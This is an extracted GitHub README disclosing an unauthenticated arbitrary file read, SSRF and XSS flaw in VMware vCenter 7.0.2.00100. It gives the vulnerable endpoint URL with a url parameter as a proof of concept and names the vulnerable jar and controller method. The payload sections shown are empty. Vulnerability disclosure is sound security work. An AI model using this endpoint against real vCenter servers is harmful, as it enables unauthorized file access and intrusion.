Repository: l0ggg/VMware_vCenter
Branch: main
Commit: e81ba3eedb26
Files: 1
Total size: 633 B
Directory structure:
gitextract_6wu0oafl/
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# VMware vCenter earlier versions (7.0.2.00100) has unauthorized arbitrary file read + ssrf + xss vulnerability
## POC
https://{vCenterserver}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url={url}
File read:
SSRF + XSS:
## vulnerable code:
/etc/vmware/vsphere-ui/cm-service-packages/com.vmware.cis.vsphereclient.plugin/com.vmware.h4.vsphere.client-0.4.1.0/plugins/h5-vcav-bootstrap-service.jar
com.vmware.h4.vsphere.ui.bootstrap.controller.ProvidersController.getProviderLogo()
Tested on vCenter 7.0.2.00100, not knowing the exact affected version range or cve id
gitextract_6wu0oafl/ └── README.md
Condensed preview — 1 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (1K chars).
[
{
"path": "README.md",
"chars": 633,
"preview": "# VMware vCenter earlier versions (7.0.2.00100) has unauthorized arbitrary file read + ssrf + xss vulnerability\n## POC\nh"
}
]
About this extraction
This page contains the full source code of the l0ggg/VMware_vCenter GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 1 files (633 B), approximately 246 tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.